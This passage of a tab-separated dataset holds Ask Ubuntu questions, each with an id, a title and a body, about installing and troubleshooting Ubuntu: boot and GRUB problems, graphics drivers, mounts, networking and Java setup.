ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : wlan0 version : 22 serial : 00:26 : b6:5c : b1 : e9 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=r8180 latency=0 multicast=yes wireless=802.11b/g resources : irq:17 ioport:4000 ( size=256 ) memory : c0900000-c0903fff
354178	what is ftp username and password for vsftpd ?	i installed vsftpd on ubuntu 12.04 , and now how do i log in ? which username and password do i use ? i tried using root and the password for root , but that did n't work .
354189	how to unlock multiple encrypted partitions on boot ?	i have two encrypted partitions sharing the same passphrase . i would rather not enter the password twice plus the login password . how can i unlock both partitions at once ? maybe even only enter one password on bootup ( but without disabling the account 's password , since i 'd like to keep the ability to lock my screen with ctrl alt l )
354197	how do i prevent updates to a new xorg/fglrx stack when upgrading point releases ?	i just installed ubuntu 12.04.1 because i need the fglrx-legacy driver installed . when i installed ubuntu 12.04.3 or fully updated 12.04.1 , i was unable to install this driver because i found out that they have xorg 1.13 . how can i prevent ubuntu 12.04.1 from updating to 12.04.2 or 12.04.3 while still installing other necessary updates ? i read that synaptic package manager has the ability to lock certain packages , but i have no idea which ones i would have to lock to prevent these updates .
354199	ca n't install ubuntu due to grub error	i am trying to install ubuntu 12.04 an placed it on a usb and when i load up my usb i get an error saying when i load up my pc ( legacy boot enabled ) and press f9 it shows ubuntu as one of the options even though i do n't have it installed and when i go to it i get this error . how can i fix this to install ubuntu ? i 'm on windows 8 .
354202	launchpadlibrarian overview , background	what is http : //launchpadlibrarian.net ( besides `` a file repository used by launchpad '' ) ? what is there ? how do you find out where things are ? are the urls permanent ? in particular , does it contain ppa .deb archives ? or is there some other way to get .debs for ppa packages ?
354206	how to create a bootable usb hfs+ on ubuntu ?	i 've been trying to make an usb stick that is formatted to hfs+ ( done ) and then make bootable image from mac os x .iso . if the usb is not hfs+ my mac does n't recognize it as a usb bootable . does someone know what should i do to create this usb stick ?
354208	how do i change the default boot entry wih easybcd and skip a extra reboot .	after installing windows i installed ubuntu with creating a separated partition to boot . then i have added this partition with easybcd software , as boot options of windows . until here i did n't have any problems . but choosing ubuntu now causes an extra reboot . i do n't want that , please tell me how to get ride of this problem or how to choose ubuntu as my default boot . thanks in advance .
354209	recovering data after installtion	i was using ubuntu with wu bi and i decided to install it and delete windows . in the installation process i checked the option with l v m and now i ca n't find any of my windows data or any partition or any of my windows data.i had 3 partitions c : and d : and e : my data was on d : and e : now any one can help me to restore my data it 's really important .
354210	13.04 wo n't start	i am trying to run ubuntu 13.04 as live with the objective of installing it on a machine with xp on it . i boot from the cd and the process starts normally but stalls completely after about 3-5 minutes of the setup screen ( with the dots ) . i 'm using a core 2 duo with 3gb . i 've tried adjusting the setup options but to no avail . i 'm obviously doing something incorrectly but have no idea what ! any help would be most appreciated . cheers !
354212	problems installing packettracer v5.3.3 on ubuntu 12.4 lts ( 64bit )	i am trying to install `` packet tracer v5.3.3 application + tutorial.exe '' on a 64bit ubuntu 12.04 machine . after clicking through the installation wizard , i get the following message from wine : '' the program packettracer5.exe has encountered a serious problem and needs to close . we are sorry for the inconvenience . '' `` this can be caused by a problem in the program or a deficiency in wine . you may want to check the application database for tips about running this application . '' when i click `` show details '' i get a tremendous amount of code . id very much appreciate if someone could help on this . i 'm trying to improve my skills on linux but compatibility issues mixed with my lack of knowledge is making the transition awfully painful . thanks in advance
354213	ubuntu updates service stopped working	update-manager requires instalation of untrusted packages details apport apport-gtk gnome-settings-daemon ifupdown libldap-2.4-2 libpulse-mainloop-glib0 libpulse0 libpulsedsp pulseaudio pulseaudio-module-bluetooth pulseaudio-module-gconf pulseaudio-module-x11 pulseaudio-utils python-apport python-problem-report
354216	password disable	i am the only user on my pc and do not want to enter my password . how do i disable ? i do not want to enter a password every time my screen saver starts or i install any aps .
354218	ubuntu 12.10 missing input js0	the file /dev/input/js0 is missing from my directories . i am attempting to use the joy2key plugin from the software center to map keystrokes to my gamepad but when i attempted to start i got the following response in the terminal : $ joy2key -dev /dev/input/js0 -terminal joy2key - reads joystick status and dispatches keyboard events by peter amstutz ( tetron @ interreality.org ) this is free software under the gnu general public license ( gpl v2 ) ( see copying in the joy2key archive ) you are welcome to use/modify this code , and please e-mail me if anything cool comes of it ! version : 1.6.3 binary built on dec 22 2009 at 13:45:44 error opening /dev/input/js0 ! are you sure you have joystick support in your kernel ? $ i double-checked this by navigating to /dev/input in the file manager and saw no file or folder `` js0 '' . i am running ubuntu 12.10
354220	after logging into guest account , my user 's desktop customizations are gone	this is a weird one . out of curiosity i had clicked on the guest session option at login , to see what it was like . now , when i log into my original user , all of my desktop customizations are gone and i 'm presented with the default desktop ! what happened ? ! restarted lightdm and then the machine , which did n't get the job done . i have another user on the machine whose settings have not been affected . i 'm not sure exactly where the problem lies , so i 'll try to give a few examples : my international keyboards are gone , as is ibus chinese input . my settings for the trackpad ( i.e . two finger scrolling , two finger right-click ) are gone . my wallpaper image is gone and it 's back to the unity default purply thing ( even though on the lock screen , it is still there ) the apps docked to the launcher are back to defaults . i tried to take a peek at my hidden files in the home folder , and looked at the only one i had edited by hand , .gtk-bookmarks , and my personalizations are gone ! as i write that , i now fear that ubuntu has erased/replaced my settings files , though i hope it has n't been destructive and that this information may be stored somewhere . i could go back and start changing everything by hand again , but this is weird and needs a mention ! any thoughts ? running 12.04 . thanks !
354223	is there a way to search unofficial repositories in launchpad ?	i was wondering if this stdin plasmoid had been packaged by someone , so i googled for it . it seemed like it has been packaged as plasma-widget-stdin . however , this ( unofficial ) ppa also contained a some other things that i was uninterested in ( and might unintentionally upgrade ) . i wanted to see if there were other ppas contained this widget , so i attempted to search . however , it seems that the launchpad search only contains official packages . is there a way to search launchpad for unofficial packages and repositories ?
354225	networking crashes on server when using sftp	i am using ubuntu server 13.04 on my home server and for some reason when i attempt to transfer larger files or many files the sftp server will crash out and all networking to and from the server is dead and the entire server has to be rebooted . i have been looking online for almost 2 weeks now with no results . does anyone know of a way to fix this ? please let me know if i was not specific enough . thanks , steve
354227	ubuntu ca n't launch after failure to upgrade 12.10 to 13.04	i upgraded my ubuntu last night and i had a very slow internet ( 502kbits ) and waited hours to finish downloading , then it started installing 13.04 . but then i got a error ... i dont remember what it was , so i just clicked forward and continued installing , that time i already had a bed feeling that something was going to happen . when it finished installing it said ( i do n't remember that much ) blah blah blah your system is in a unusable state ... ( sorry for blah blah blah , just do n't remember that part . so then i tried restarting , but then the usual message you get when your about to restart was all squares and it was freaky ! ! did not understand a single thing written there . still i pressed the button that usually say restart . then i tried to restart , grub launched successfully and pressed enter to start ubuntu , but then it was just a black screen with a white line at the very left top and could not do anything . i researched a lot that night and found so many similar problems but grub not loading and not similar to my problem i get , i can get grub loading but not ubuntu loading . i also tried a boot-repair from a usb and done a recommended repair but it was n't successful . so i got the boot-repair to generate a code to post on ubuntu forums http : //paste.ubuntu.com/6198800/ ( i 'm new to ubuntu ask ) if anyone can solve the problem please help me ... i had so many important files on my computer and i hate to lose them . thankyou . ( sorry for bad english and i 'm a linux noob )
354228	how to a fix a resolution glitch with ubuntu 13.04 ?	i just downloaded a huge update to ubuntu 13.04 , only to find when i restarted my computer , my resolution was locked at 640x480 ( 4:3 ) , when it should be 1600x900 ( 16:9 ) , and i could not changed it . i 've tried everything that has been recommended to me , but still no luck . can someone give me permission so i can post pictures of the problem ? if you need any more information , i 'll post it below . -hope you can help me ! -cheers !
354229	command not found when sshing into ubuntu 12.04	i have an issue when logging into my ubuntu 12.04 machine via ssh . it lags for about 40 seconds after printing half of the motd . then it says [ ... ] : command not found and completes the login . my motd reads as follows when i log in : welcome to ubuntu 12.04.3 lts ( gnu/linux 3.2.0-35-generic-pae i686 ) * documentation : https : //help.ubuntu.com/ last login : sat oct 5 20:37:30 2013 from windows [ ... ] : command not found i looked into modifying /etc/motd . however , the system uses update-motd and i ca n't wrap my head around how that program works . i ca n't find in which file the offending missing command is in . i like the dynamis motd , but this lag is driving me nuts . lil help ? my /etc/update-motd.d/ looks like this : me @ server : /etc/update-motd.d $ ls -al total 44 drwxr-xr-x 2 root root 4096 aug 29 02:16 . drwxr-xr-x 156 root root 12288 oct 5 20:41 .. -rwxr-xr-x 1 root root 1220 apr 19 2012 00-header -rwxr-xr-x 1 root root 1358 apr 19 2012 10-help-text -rwxr-xr-x 1 root root 149 aug 22 2011 90-updates-available -rwxr-xr-x 1 root root 129 sep 30 2011 91-release-upgrade -rwxr-xr-x 1 root root 142 aug 22 2011 98-fsck-at-reboot -rwxr-xr-x 1 root root 144 aug 22 2011 98-reboot-required -rwxr-xr-x 1 root root 1158 apr 19 2012 99-footer thanks in advance , wonderful internet folk .
354233	ubuntu server static ip problem	hi i 've been trying and trying to chang emy ubuntu servers ip to static so i can have people join my minecraft server that i have set up , i 've been working on it for 2 days straight with no luck , when i change my ip through sudo gedit /etc/network/interfaces i was told to change it to something similiar to this iface eth0 inet static address 192.168.1.100 netmask 255.255.255.0 gateway 192.168.1.1 but it doesnt work for me i have tried in gateway putting my routers ip address which i found in the routers menu information that doesnt seem to work what does is when i have the ip as 10.0.0.8 or something similiar thoe i still have problems can anyone help i relaly want to get this set up and learn how to do this properly ?
354235	fstab wont mount share , cant see what im doing wrong ?	i had this working until a reinstall today . my home folder was on another disk so my ~/.smbcredentials file is fine . so it must be my fstab or app not installed . i have cif-utils installed and i 've checked my search history for the guide i used but i ca n't seem to get it to work . //kaboom.local/media /home/noki/kaboommedia cifs credentials=/home/noki/.smbcredentials , uid=1000 , iocharset=utf8 , noperm 0 0 on 'sudo mount -a ' i get : mount error ( 95 ) : operation not supported refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) through unity i get it to mount through the cifs option and i can ping kaboom.local and get a response . stupidly did n't backup my fstab , will this time . thanks , noki
354237	gtx 680 three monitors	i 'm currently looking around for a new gpu and have been eyeing the gtx 680 for it 's decent price point and it 's ability to do single card surround . i 'm not expecting to get surround in ubuntu , although that would be sweet , i would like to know if it is possible to use three monitors with unity and compiz . i currently have a gtx 550 ti and a 9800gt in my system to use three monitors but i have had to use xfce to do it and i miss unity .
354238	data structure altered in user login	what data structure gets altered when a user logs in ?
354239	in the system open file dialog , sort / filter by file type ?	ubuntu 12.10 , nautilus 3.4.2 an application that shows the user the native open file dialogue has one drawback - no filter on the type of files ( or file extension ) . there are options to sort by name , size and date modified , but i do n't know how to enable sort / filter by file type . can it be done ? screenshot below from gedit .
354241	what is vpro , is it linux compatible ?	i saw that some of the lenovo laptops have `` vpro '' processors , which enable special management features : http : //www.intel.com/content/www/us/en/architecture-and-technology/vpro/vpro-technology-general.html most of these features sound like software features , not cpu features , how exactly does this integrate ? is it compatible with linux/ubuntu management features ? is this the `` trusted computing '' thing the free software folks were against some time ago ?
354246	improper unity display	today , after updating 12.04 lts and openoffice to 4.0.1 , i noticed some missing programs in the menu , software center k3b . i reinstalled them and i shut down my computer . later when tried to log on the gui kept bringing me back to the login screen . i added the gdm package and now can log on to the `` gnome session '' , but get a faliure to launch message with the ubuntu and ubuntu 2d settings . when in the `` gnome session '' , the icons on the right side the screen and the bar across the top show not the selected wallpaper , except seen as a background in shadow .
354247	trouble using command : sudo dpkg-reconfigure $ ( dpkg -l | awk ' { print $ 2 } '|grep `` ^xserver '' |tr '\n ' ' ' )	i type : sudo dpkg-reconfigure $ ( dpkg -l | awk ' { print $ 2 } '|grep `` ^xserver '' |tr '\n ' ' ' ) ouput : /usr/sbin/dpkg-reconfigure : xserver-xorg is broken or not fully installed i type : sudo apt-get install xserver-xorg it seems to work . i type : sudo dpkg-reconfigure $ ( dpkg -l | awk ' { print $ 2 } '|grep `` ^xserver '' |tr '\n ' ' ' ) output : /usr/sbin/dpkg-reconfigure : xserver-common-lts-quantal is broken or not fully installed i type : sudo apt-get install xserver-common-lts-quantal which also seems to work . i type : sudo dpkg-reconfigure $ ( dpkg -l | awk ' { print $ 2 } '|grep `` ^xserver '' |tr '\n ' ' ' ) output : /usr/sbin/dpkg-reconfigure : xserver-xorg is broken or not fully installed for information on my system , and what i am trying to do , reference : ubuntu 12.04 touch-pad and keyboard problems asus q500a output for : sudo dpkg -l | grep xserver-xorg-video : ii xserver-xorg-video-all 1:7.6+12ubuntu2 x.org x server -- output driver metapackage ii xserver-xorg-video-ati 1:6.14.99~git20111219.aacbd629-0ubuntu2 x.org x server -- amd/ati display driver wrapper ii xserver-xorg-video-cirrus 1:1.3.2-4build1 x.org x server -- cirrus display driver ii xserver-xorg-video-fbdev 1:0.4.2-4ubuntu2 x.org x server -- fbdev display driver ii xserver-xorg-video-intel 2:2.17.0-1ubuntu4.4 x.org x server -- intel i8xx , i9xx display driver rc xserver-xorg-video-intel-lts-quantal 2:2.20.9-0ubuntu2.2~precise1 x.org x server -- intel i8xx , i9xx display driver ii xserver-xorg-video-mach64 6.9.0-1build2 x.org x server -- ati mach64 display driver ii xserver-xorg-video-mga 1:1.4.13.dfsg-4build2 x.org x server -- mga display driver ii xserver-xorg-video-neomagic 1:1.2.5-2build2 x.org x server -- neomagic display driver ii xserver-xorg-video-nouveau 1:0.0.16+git20111201+b5534a1-1build3 x.org x server -- nouveau display driver ii xserver-xorg-video-openchrome 1:0.2.904+svn1050-1ubuntu0.1 x.org x server -- via display driver rc xserver-xorg-video-openchrome-lts-quantal 1:0.3.1-0ubuntu1~precise3 x.org x server -- via display driver ii xserver-xorg-video-qxl 0.0.16-2ubuntu0.1 x.org x server -- qxl display driver ii xserver-xorg-video-r128 6.8.1-5build2 x.org x server -- ati r128 display driver ii xserver-xorg-video-radeon 1:6.14.99~git20111219.aacbd629-0ubuntu2 x.org x server -- amd/ati radeon display driver ii xserver-xorg-video-s3 1:0.6.3-4build2 x.org x server -- legacy s3 display driver ii xserver-xorg-video-savage 1:2.3.3-1ubuntu1 x.org x server -- savage display driver ii xserver-xorg-video-siliconmotion 1:1.7.5-1build2 x.org x server -- siliconmotion display driver ii xserver-xorg-video-sis 1:0.10.3-3build2 x.org x server -- sis display driver ii xserver-xorg-video-sisusb 1:0.9.4-2build2 x.org x server -- sis usb display driver ii xserver-xorg-video-tdfx 1:1.4.3-4build2 x.org x server -- tdfx display driver ii xserver-xorg-video-trident 1:1.3.4-2build2 x.org x server -- trident display driver ii xserver-xorg-video-vesa 1:2.3.0-7build2 x.org x server -- vesa display driver ii xserver-xorg-video-vmware 1:12.0.1-1ubuntu1.1 x.org x server -- vmware display driver rc xserver-xorg-video-vmware-lts-quantal 1:12.0.2+git.e5ac80d8-0ubuntu1~precise2 x.org x server -- vmware display driver seth @ seth-q500a : ~ $ sudo apt-get autoremove : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . seth @ seth-q500a : ~ $ sudo apt-get autoclean : reading package lists ... done building dependency tree reading state information ... done seth @ seth-q500a : ~ $ sudo apt-get -- purge remove : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . seth @ seth-q500a : ~ $ sudo dpkg-reconfigure $ ( dpkg -l | awk ' { print $ 2 } '|grep `` ^xserver '' |tr '\n ' ' ' ) : /usr/sbin/dpkg-reconfigure : xserver-common-lts-quantal is broken or not fully installed seth @ seth-q500a : ~ $ sudo apt-get autoremove $ ( dpkg -l | awk ' { print $ 2 } '|grep `` ^xserver '' | grep lts-quantal | tr '\n ' ' ' ) : reading package lists ... done building dependency tree reading state information ... done package xserver-common-lts-quantal is not installed , so not removed package xserver-xorg-core-lts-quantal is not installed , so not removed package xserver-xorg-lts-quantal is not installed , so not removed package xserver-xorg-video-intel-lts-quantal is not installed , so not removed package xserver-xorg-video-openchrome-lts-quantal is not installed , so not removed package xserver-xorg-video-vmware-lts-quantal is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
354248	how to set up a very secure file server for home backup that is not available to the internet ?	i am trying to setup a home backup machine running ubuntu . i want to be able to rsync from other linux machines and possibly from windows 7 ( the windows part is not essential ) . i have read lots of tutorials about setting up with internet access but my aim is to have maximum security and not be able to access this machine from the internet .
354249	mouse and keyboard unresponsive in installation	i am trying to dual boot ubuntu with my windows 7 and i have ubuntu 13.04 amd64 on a usb stick on my desktop . when i go to install it it boots up fine but when it asks to try ubuntu or install ubuntu my mouse and keyboard do n't work but they are on . i have a intel i7 3730k and plenty of ram . what can i do to fix this ?
354251	13.04 lpr , windows xp only printer , can talk to windows lpd , but ca n't get printing to work	i have a system running windows xp sp3 , with a xerox docuprint p8 ( windows only printer ) attached to it , which works fine as a shared printer wiht windows xp , but i am unable to get it to print jobs , which i have sent from my ubunutu 13.04 system using lpr , or rlpr . i am able to query the windows xp lpd , however have been unsuccessful in getting a job to print . i see it appear in the queue on the windows xp system , but mysteriously , the job disappears from the queue , but is never printed . any suggestions , recommendations , etc , would be greatly appreciated . i am able to check the queue on the xp system with the following command : rlpq -hprintserver -pxpp8 i see the windows xp server respond with the lpd header and showing no entries in the queue , whether or not i have queued a job , but when a job is queued , it appears in the xp printer queue , but then just vanishes , without actually printing .
354256	how do i download minecraft ?	how do i get minecraft on ubuntu ? every time i download , i ca n't open minecraft , instead it just puts me in a file folder . please help , max
354258	help move swap and home to new hard drive	ssd for os drive and 1tb storage drive for everything else . i want to move the swap partition and home location to the storage drive . the 1tb storage drive is already formatted with one maximum ext4 partition and in use . i copied all ( including hidden ) files from my current home to the storage drive . in an attempt to free space off my ssd : -how do i move the swap partition to the storage drive and -how do i make ubuntu recognize and use the large partition on the storage drive as my home directory output of `` sudo blkid '' : /dev/sda1 : label= '' ubuntustudio '' uuid= '' ee1e08ef-ec2c-4182-af89-6ef82bd49e1d '' type= '' ext4 '' /dev/sda5 : uuid= '' 764e72ce-0a1d-44df-a124-933f58907d11 '' type= '' swap '' /dev/sdb1 : label= '' storage '' uuid= '' 9f8e4be2-90d7-47ad-8d12-f912ca2ba2db '' type= '' ext4 ''
354259	how to group fields having same data using basic command	i am new to ubuntu . so please tolerate me if it is a silly question . my fields are : ritesh : nair : it:58 saylee : domki : it:62 monica : shinde : it:69 mahesh : nair : extc:53 arun : nair : extc:64 i wanted the output something like this : it 3 extc 2 please help me out .
354261	garbled characters when accessing remote machine	i access my office machine using hoblink which i believe presents desktop in form of a java applet . it works very well in windows without any issues but in ubuntu i face following issues : if i connect using unity desktop then i ca n't read characters properly as they are garbled . if i connect using cinnamon desktop then screen opens perfectly first time but if i minimize the remote machine window and work on ubuntu and then open the remote machine window again , the characters become garbled again . any suggestions on resolving this ?
354263	i want to install ubuntu [ any version greater than or equal to 12.04 ] from my windows os	i want to install ubuntu [ any version greater than or equal to 12.04 ] from my windows os , with no pendrive and no cd . is it possible ? by downloading an iso , mount it to a drive and boot from there , to install ubuntu , along with my windows os .
354265	lubuntu13.04 does n't respond when rebooting after the installation is finished	i have installed lubuntu 13.04 on my netbook , but when it 's finished installing , nothing happens when it 's restarted . i have been waiting for 10-15 minutes . my netbook specs are : system information time of this report : 10/6/2013 , 08:43:23 machine name : oatsara-netbook operating system : windows 7 eternityâ˘ 2009 32-bit ( 6.1 , build 7600 ) ( 7600.win7_gdr.130318-1532 ) language : english ( regional setting : english ) system manufacturer : clevo co. system model : w210cuq bios : phoenix bios sc-t v2.1 processor : n/a memory : 2048mb ram available os memory : 2008mb ram page file : 1990mb used , 2027mb available
354266	ubuntu 11.04 on an ibook g4	i am looking into installing ubuntu 11.04 on an ibook g4 from 2005 . i read that it is bad for the motherboard to install 12.04 , that the heat bent the logic board and dislocated the graphics chip , and the machine would n't boot . i already have ubuntu on a cd , and i was wondering if anyone would shed some light on this . is it good or bad for ubuntu to run on this platform ? i was thinking of a dual boot . thanks in advance !
354267	why do i need to install `` numlockx '' ?	i understand what numlockx does and how to install it . i do n't understand why installing ubuntu 12.04 caused my numlock key to not turn on by default . after the grub menu and before login , whether i choose windows 7 or ubuntu 12.04 my numlock key is off . why ?
354268	12.04 - blank screen with blinking cursor after grub	i 'm really new to ubuntu so although i 've read the replies to previous similar questions , i ca n't understand what i need to do . i installed ubuntu 12.04 on my mac with os x 10.6.8 two days ago . everything seemed to work fine except i 'd get the black/purple screen mentioned here ( my computer boots to a black screen , what options do i have to fix it ? ) every time i boot ubuntu . therefore as suggested , i downloaded propritary drivers for nvidia ( there were quite a few listed ) . after rebooting the second nvidia driver update , my laptop refuses to boot beyond the grub screen and freezes with a black screen with blinking cursor . it does n't respond to ctrl+alt+f1 so i ca n't bring up terminal to type in the sudo commands mentioned in other answers . i have also tried nomodeset to no avail . the same thing occurs if i try to reboot from usb . if it helps , here are the specs for my setup : graphics : nvidia geforce 9400m model : macbookpro5,5 any help would be greatly appreciated .
354269	secondary os problem ?	i 'm trying to install ubuntu 12.04.3 on my dell latitude d620 by putting it on my stick drive , but when i tell my bios to boot from it , it just gives a black screen . wtf ? i really want to use this !
354272	no wifi device available	since a couple of days , my wifi card keeps disappearing from ubuntu once in a while for a couple of restarts . i have attached my system log , does anyone have an idea what the issue could be ? usually , it first says 'device not ready ' , and after a restart 'no networking devices available ' . i have used ubuntu on this dell xps 13 machine for a year now , never had similar issues . also , a fresh install did n't change anything . even the live system might not detect the device . system logfile after disappear and reappear thanks a bunch !
354274	how to change the access of a partition from root to user	i can not access the files on a partition after i create it . i am using zorin os 7 core live usb ( its a ubuntu based os and it still has all of the core files of ubuntu ) . when i go to the permissions of the partition it tells me that it is owned by root . i need to access the partition to store the files i use ( i dual boot , its the community home folder ) . i used gparted to do the partitioning . it successfully did the partition but it made it root . the partition type is ext4 . any help to change the ownership would be great , thanks !
354278	how to resize the dash for desktop from terminal ?	i had installed ubuntu 13.10 i want to know how to re-size the dash size to the desktop through terminal . so please let me know i have tried every setting but not fulfilled .
354279	cursor not moving with touchpad	i loaded ubuntu 12.05 lts on dell inspiron n5110 . a few days at worked fine . all of a sudden cursor stopped moving after logging to my account . it works fine before login and in guest login
354280	simple frontend with qml ( for n2n client )	i am trying to write a simple qml application being a n2n frontend of the client and following the tutorial . this application is first intended for the desktop , but if it can also be used as a phone application for ubuntu touch , even better . you can see the code hereunder , but since i am not really a developer , i have basic questions : how can i execute a shell command in qml ( the n2n programme is run in the terminal with the `` edge '' command + few parameters ) . how can i pass variable in this shell command to be executed ? how to store the parameters in a configfile for the next time ? thanks in advance for your help ! the code : import qtquick 2.0 import ubuntu.components 0.1 import `` components '' import ubuntu.components.listitems 0.1 import ubuntu.components.popups 0.1 /* ! \brief mainview with a label and button elements . */ mainview { id : root // objectname for functional testing purposes ( autopilot-qt5 ) objectname : `` mainview '' // note ! applicationname needs to match the `` name '' field of the click manifest applicationname : `` com.ubuntu.developer.no launchpad user id configured..n2nedge '' /* this property enables the application to change orientation when the device is rotated . the default is false . */ //automaticorientation : true width : units.gu ( 30 ) height : units.gu ( 50 ) property real margins : units.gu ( 2 ) property real buttonwidth : units.gu ( 9 ) page { title : i18n.tr ( `` n2n edge '' ) column { id : pagelayout anchors { fill : parent margins : root.margins } spacing : units.gu ( 1 ) row { spacing : units.gu ( 1 ) textfield { id : networkpwd placeholdertext : `` password '' echomode : textinput.normal } } row { textfield { id : nodeip placeholdertext : `` node ip '' echomode : textinput.normal } } row { textfield { id : nodeport placeholdertext : `` node port '' echomode : textinput.normal } } row { textfield { id : networkname placeholdertext : `` network name '' echomode : textinput.normal } } row { textfield { id : clientip placeholdertext : `` client ip '' echomode : textinput.normal } } row { button { id : validatepwdbutton text : i18n.tr ( `` validate '' ) width : units.gu ( 12 ) onclicked : { cmdform.update ( ) ; } } } row { textfield { id : cmdform placeholdertext : `` sudo edge -a clientip -c networkname -k pwdform -l nodeip : nodeport '' echomode : textinput.normal } } } } }
354281	windows wont boot after installing ubuntu 12.04 boot repair link provided	i tried to install ubuntu by usb and had some issues with dmraid . i followed directions to disable that via the command prompt and it installed fine . i tried to reboot and received an error message about grub rescue . windows and ubuntu both will not boot . i tried repair grub from a live usb and i was given this link paste.ubuntu.com/6199343 at this point i 'm just hoping to get windows working again.if someone can help me that 'd be great .
354282	remote desktop from windows machine using something other than unity ?	ubuntu 12.04.3 i have a question regarding a computer i use as a file server on my home network . the hardware is actually an old asus netbook ( do n't laugh , it 's low power , silent , and has a built in backup power supply ) . i originally used the machine as a normal workstation but when the keyboard went i started using it as a server . i used tasksel to remove `` ubuntu desktop . '' due to it 's high resource usage . i mostly access the machine using ssh , but now that i have removed unity i miss being able to use a remote desktop . is there a way that i can set up a graphical desktop to use remotely from my windows machine that will be less intensive than unity ? i would prefer , if possible , that the computer itself does n't show anything on the screen while i am using it remotely . there is a driver bug that does n't allow me to close the lid without the system going to sleep , so being able to have the screen be blank while i 'm remotely using a graphical desktop would be great . any ideas , oh great community of linux intellectuals ? any help would be appreciated !
354283	external monitor on 13.04 : mouse flickers , weird refresh	i 'm using a fresh install ubuntu 13.04 on a laptop , and i use it often but not always with an external hdmi monitor , but i get weird behavior whenever i use dual screen . if i have the cable plugged in as the login screen shows up , it goes into low-graphics mode and the mouse is gone . i can plug the cable after login and configure the display , but then the mouse pointer on the laptop monitor flickers , and the external monitor only seems to refresh a small area for some time , so i get mouse trails and the likes . i was told these problems would be gone after installing the nvidia drivers , but the list in additional drivers is empty , and if i try to install the drivers through other means , it just stops detecting the monitor , even with xrandr . the couple of times i 've tried , i 've had to reinstall the os because the monitor would n't work even after purging the driver packages and i could n't find any other way . is this a bug ? do i need to install something ? in case it matters , running lspci | grep vga gives : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 540m ] ( rev ff )
354284	share folder from ubuntu one files android	is it possible to directly share a folder from ubuntu one files for android ? what about the app 's developement ? does it stopped ?
354285	how do i recover my data from a failing hard disk ?	the other day i copied about 230gb of data from one external hdd to my new external hdd . i woke up , ensured that everything was working properly , and shut down the computer . today i decided to use the new external hdd , and now neither windows nor ubuntu will recognize it . this new external hard drive is less than a week old , but i ca n't do anything with it . ubuntu sees it on gparted , but it will not do anything . it says partition table unrecognized and my drive is supposed to be 3tb , while gparted thinks it 13.75tb . the data has already been deleted from the original source . now this external hdd has the only undeleted copy of all 230gb of the original data . when i tried to recreate the partition table , it gave me an error pertaining to read and write . the new hdd 's format table has been corrupted . so now i want to recover the original data that i deleted from my old external hard drive , which is still working properly . any advice would be appreciated .
354288	switch video card	how to switch the integrate video card intel to discrete video card nvidia , i fond a solution on askubuntu with ubuntu control centre but e : unable to locate package ucc . exists other else methods for switching video cards ?
354289	broken or unidentified package : synaptic and ubuntu software center	when i started the synaptic package manager , i get : - e : malformed line 52 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . go to the repository dialog to correct the problem . e : _cache- > open ( ) failed , please report . i am also unable to open the ubuntu software center . recently , i tried installing skype on ubuntu 12.04 lts . for that , i used the following commands : - sudo dpkg -- add-architecture i386 sudo apt-get update sudo add-apt-repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner '' sudo apt-get install skype the message `` package skype not found '' . after this , problems with synaptic and ubuntu software center started . i also get regular pop-ups saying that an internal error occured . please help..
354291	`` no such file or directory , sml '' in emacs	i installed emacs 24.3 and sml-mode . when i open a .sml file in emacs and try to run buffer using ctrl+c and ctrl+s it gives : searching for program : no such file or directory sml emacs is extracted at /etc/emacs-24.3 and sml is extracted at /home/user/softwares also i am unable to run sml from terminal . i think i have to add the path of sml to emacs somehow . is that right ? or do i need to do something else ?
354292	linux kernel upgrade to 3.11.4 in ubuntu 13.04	i upgraded to kernel 3.11.4 in ubuntu 13.04 64bit but lost my desktop ( no icons , only wallpaper displaying ) . removed the upgrade with sudo apt-get purge linux-image-3.11.4 but the desktop problem remains . tried to renew grub-loader in advanced boot , no joy . any suggestions ?
354296	how to install intel fortran on ubuntu ?	i just want to install intel fortran 2013 on ubuntu 13.04 64bit please help me . i have few info about installing softwares in ubuntu . thanks a billion .
354298	crossfire ati hd 3870s `` adapter not detected ''	thanks for your time . i 'm having an issue where additional drivers sees no video drivers for my cards , and when i installed fglrx via terminal and ran aticonfig -- initial , it claims i have no supported adapters . i have two ati hd 3870 's running in a crossfire config , and i need proprietary drivers for gaming . when i do a lspci -vvnn | grep vga , i get the following output : http : //pastebin.com/vk2qmcrz edit : i noticed that it is not listed on the fglrx site but is listed for the linux legacy driver : http : //support.amd.com/us/gpudownload/linux/legacy/pages/legacy-radeon_linux.aspx - do i need to install from the blob ? is there there a better way to install ? ~prays~
354301	can not open eclipse indigo in ubuntu 12.04 with openjdk-7-jdk installed	i have the openjdk-7-jdk installed , the java -version java version `` 1.6.0_27 '' openjdk runtime environment ( icedtea6 1.12.6 ) ( 6b27-1.12.6-1ubuntu0.12.04.2 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode ) i have tried to download eclipse indigo directly from the eclipse site and unzip it , when i try to open eclipse , it stay in the opening state , the blue rectangle stay there forever and no error message at all . i try to install eclipse indigo also from terminal , the same situation there . what is wrong with it ? really need some help here . even the ubuntu is newly installed . more info , the editions of eclipse i tried are eclipse-java-indigo-sr2-linux-gtk-x86_64 and scala-sdk-3.0.1-vfinal-2.10-linux.gtk.x86_64
354302	java installed but javac not found	i have installed java longtime back , which java /usr/bin/java java -version java version `` 1.7.0_09-icedtea '' openjdk runtime environment ( rhel-2.3.8.0.el6_4-x86_64 ) openjdk 64-bit server vm ( build 23.7-b01 , mixed mode ) typing java throws me up with the options which could mean that java is installed . in my jdk path , /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.9.x86_64/ i see jre/bin and under that i find java executable binary . i do n't see javac . my java_home ( is set to my java dir ) , says this -bash : /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.9.x86_64/jre : is a directory do i need to install jdk ? how to run javac from any directory ?
